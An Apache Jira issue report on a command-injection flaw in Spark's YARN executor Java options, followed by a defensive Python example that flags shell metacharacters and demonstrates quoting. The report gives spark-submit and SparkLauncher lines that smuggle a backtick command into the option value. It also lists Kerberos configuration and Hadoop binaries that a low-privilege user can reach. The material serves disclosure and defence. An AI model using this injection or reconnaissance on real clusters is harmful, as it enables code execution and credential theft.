[ https://issues.apache.org/jira/browse/SPARK-50239?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Zijie updated SPARK-50239:
--------------------------

Description:

* Attack Path

First, we need to obtain regular user privileges and construct a JAR file according to custom rules. When yarn submits a task, I put a command-injection string on a parameter named "spark.executor.extraJavaOptions", it's about "\'touch\$IFS/tmp/zzz123\'"

There are two ways to submit parameters:

# Using command lines:
  spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf spark.executor.extraJavaOptions="\`touch\$IFS/tmp/zzz123\`" test.jar
# Using java API:
  sparkLauncher.setConf("spark.executor.extraJavaOptions", "`touch$IFS/tmp/zzz123`");

We may find command-injection logs in hadoop.

I found the vulnerability exposed in file {{ExecutorRunnable.scala}}:

  // Set extra Java options for the executor, if defined
  ...
  sparkConf.get(EXECUTOR_JAVA_OPTIONS).foreach { opts =>
    val subsOpt = Utils.substituteAppNExecIds(opts, appId, executorId)
    javaOpts ++= Utils.splitCommandString(subsOpt).map(YarnSparkHadoopUtil.escapeForShell)
  }

CVSS score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

In the directory {{Bigdata/common/runtime/security}}, there are security configurations, and the {{krb5.conf}} file is readable by the {{ldapuser}}, with the key location accessible.

In {{Bigdata/FusionInsight_Current/1_5_DataNode/install/hadoop}}, the {{ldapuser}} has read and execute permissions, allowing the execution of commands such as {{hadoop}}, {{hdfs}}, and {{yarn}}.

In {{Bigdata/FusionInsight_Current/1_6_NodeManager/etc}}, the {{ldapuser}} has read permissions, and there are business configurations present.

In {{Bigdata/FusionInsight_Current/1_6_NodeManager/install/hadoop}}, the {{ldapuser}} has read and execute permissions, allowing the execution of commands such as {{hadoop}}, {{hdfs}}, and {{yarn}}.

In {{Bigdata/FusionInsight_Current/1_8_RegionServer}}, the {{ldapuser}} has read permissions on a few files, and there are business configurations present.

was:

* Attack Path

(attachment: image-2024-11-06-11-43-13-321.png)

* How to attack?

When yarn submits a task, I put a command-injection string on a parameter named "spark.executor.extraJavaOptions"

(attachment: image-2024-11-06-14-35-49-525.png)

There are two ways to submit parameters:

# Using command lines:
  spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf spark.executor.extraJavaOptions="\`touch\$IFS/tmp/zzz123\`" test.jar
# Using java API:
  sparkLauncher.setConf("spark.executor.extraJavaOptions", "`touch$IFS/tmp/zzz123`");

We may find command-injection logs in hadoop:

(attachment: image-2024-11-06-14-43-46-128.png)

*How to exploit?*

(attachment: image-2024-11-06-14-46-16-914.png)

I found the vulnerability exposed in code:

(attachment: image-2024-11-06-14-50-06-477.png)

CVSS score:

(attachment: image-2024-11-06-14-56-36-042.png)
> JavaOptions Injection Issue
> ---------------------------
>
>                 Key: SPARK-50239
>                 URL: https://issues.apache.org/jira/browse/SPARK-50239
>             Project: Spark
>          Issue Type: Improvement
>          Components: Spark Submit, YARN
>    Affects Versions: 3.5.1
>            Reporter: Zijie
>            Priority: Major
>
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
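The report above hinges on two things a defender wants to see concretely: which characters in a Java-options value can reach a POSIX shell as something other than a literal argument, and how POSIX single-quote escaping stops them. The following is an added example written for this page; it is not code from the issue, from Spark, or from the FusionInsight installation named in the report. The function names (suspicious_java_options, escape_for_shell, argument_seen_by_shell) are hypothetical, the inclusion of spark.driver.extraJavaOptions alongside the reported executor key is an assumption, the only option value taken from the report is the touch$IFS string, the benign values are constructed, and the shell round-trip needs a POSIX sh on PATH. It uses printf to show the shell's view of an argument rather than running anything from the value.

```python
import shlex
import subprocess

# Option value quoted in the issue report, plus two constructed benign values.
REPORTED_PAYLOAD = "`touch$IFS/tmp/zzz123`"
BENIGN_OPTIONS = ["-XX:+UseG1GC", "-Dlog4j.configuration=file:log4j.properties"]

# Characters a POSIX shell interprets when they reach it unquoted:
# command substitution, parameter expansion, separators and redirection.
SHELL_METACHARS = set("`$;|&<>(){}\n")

# Conf keys whose values end up spliced into a launch command line.
# spark.executor.extraJavaOptions is the key from the report; the driver
# key is included as an assumption, since it is spliced the same way.
JAVA_OPTION_KEYS = ("spark.executor.extraJavaOptions", "spark.driver.extraJavaOptions")


def contains_shell_metachars(value: str) -> bool:
    """True if the string carries any character a shell would interpret."""
    return any(ch in SHELL_METACHARS for ch in value)


def suspicious_java_options(conf: dict) -> list:
    """Hypothetical submit-side or gateway-side check over a Spark conf dict.

    Tokenises each Java-options value the way a shell would and returns the
    keys whose tokens carry shell metacharacters. A value that does not even
    tokenise (unbalanced quotes) is reported too, since a shell would choke on
    it or reinterpret it.
    """
    flagged = []
    for key in JAVA_OPTION_KEYS:
        value = conf.get(key)
        if value is None:
            continue
        try:
            tokens = shlex.split(value, posix=True)
        except ValueError:
            flagged.append(key)
            continue
        if any(contains_shell_metachars(tok) for tok in tokens):
            flagged.append(key)
    return flagged


def escape_for_shell(arg: str) -> str:
    """POSIX single-quote escaping (own implementation, not Spark's helper).

    Inside '...' the shell performs no expansion at all, so backticks, $IFS
    and $(...) stay literal. The one character that cannot appear inside
    single quotes is the quote itself, which is written as '\\'' (close the
    string, emit an escaped quote, reopen the string).
    """
    return "'" + arg.replace("'", "'\\''") + "'"


def argument_seen_by_shell(escaped: str) -> str:
    """Hand an already-quoted token to a real POSIX shell and return the single
    argument the shell passes on. printf '%s' echoes that argument verbatim,
    so the output is exactly what a launched program would receive in argv."""
    result = subprocess.run(
        ["sh", "-c", "printf '%s' " + escaped],
        capture_output=True, text=True, check=True,
    )
    return result.stdout


def main() -> None:
    conf = {
        "spark.executor.extraJavaOptions": REPORTED_PAYLOAD,
        "spark.driver.extraJavaOptions": " ".join(BENIGN_OPTIONS),
    }
    print("flagged keys:", suspicious_java_options(conf))
    quoted = escape_for_shell(REPORTED_PAYLOAD)
    print("single-quoted token:", quoted)
    print("argument the shell hands on:", argument_seen_by_shell(quoted))
    # Contrast with double quotes on a harmless constructed value: the shell
    # expands $IFS to its whitespace value instead of passing it literally.
    print("double-quoted $IFS becomes:", repr(argument_seen_by_shell('"$IFS"')))


if __name__ == "__main__":
    main()
```

The check deliberately flags any token containing `$` or a backtick rather than trying to decide whether an expansion is harmful; a Java option that genuinely needs such a character is rare enough that a submit-time rejection with a clear message is the safer default. The round-trip through `sh` is what makes the escaping claim verifiable: the argument that comes back is the literal string, not the result of running it.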